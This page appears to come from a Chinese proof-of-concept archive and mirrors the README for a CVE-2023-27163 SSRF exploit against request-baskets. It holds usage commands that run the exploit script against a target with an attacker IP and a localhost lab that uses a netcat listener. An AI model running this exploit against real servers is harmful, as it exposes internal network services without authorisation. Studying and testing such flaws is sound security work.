POC详情: bbe58e7427a4e19a4159df69b6a207e130fb6f5f

来源
https://github.com/MasterCode112/CVE-2023-27163
关联漏洞
标题: request-baskets 代码问题漏洞 (CVE-2023-27163)
描述:request-baskets是rbaskets开源的一个Web服务。 request-baskets v1.2.1版本及之前版本存在安全漏洞,该漏洞源于通过组件/api/baskets/{name}发现包含服务器端请求伪造 (SSRF)漏洞。攻击者利用该漏洞通过特制的API请求访问网络资源和敏感信息。
描述
Proof of Concept for Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)
介绍
# Proof Of Concept of SSRF on Request-Baskets (CVE-2023-27163)

This repository contains a Proof-of-Concept (PoC) for [CVE-2023-27163](https://nvd.nist.gov/vuln/detail/CVE-2023-27163), a Server-Side Request Forgery (SSRF) vulnerability discovered in [request-baskets](https://github.com/darklynx/request-baskets) up to [version 1.2.1](https://github.com/advisories/GHSA-58g2-vgpg-335q). This vulnerability allows attackers to access network resources and sensitive information by exploiting the /api/baskets/{name} component through a crafted API request.

## Usage

```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
```

## How does it work?

Request-baskets is a web application built to collect and register requests on a specific route, so called basket. When creating it, the user can specify another server to forward the request. The issue here is that the user can specify unintended services, such as network-closed applications.

For example: let's suppose that the server hosts Request-baskets (port 55555) and a Flask web server on port 8000. The Flask is also configured to only interact with localhost. By creating a basket which forwards to `http://localhost:8000`, the attacker can access the before restricted Flask web server.

## Testing in localhost

![PoC image](./poc.png)

1. Start the Docker container of Request-Baskets

```shell
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git

2. Download the PoC

```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
```

3. Wait for a connection

```shell
nc -lvp 8000
```

4. Save the docker host ip address
```shell
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
```

5. Run the PoC 

```shell
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
```
文件快照

 [4.0K]  /data/pocs/bbe58e7427a4e19a4159df69b6a207e130fb6f5f
├── [1.7K]  CVE-2023-27163.sh
├── [733K]  poc.png
└── [1.9K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。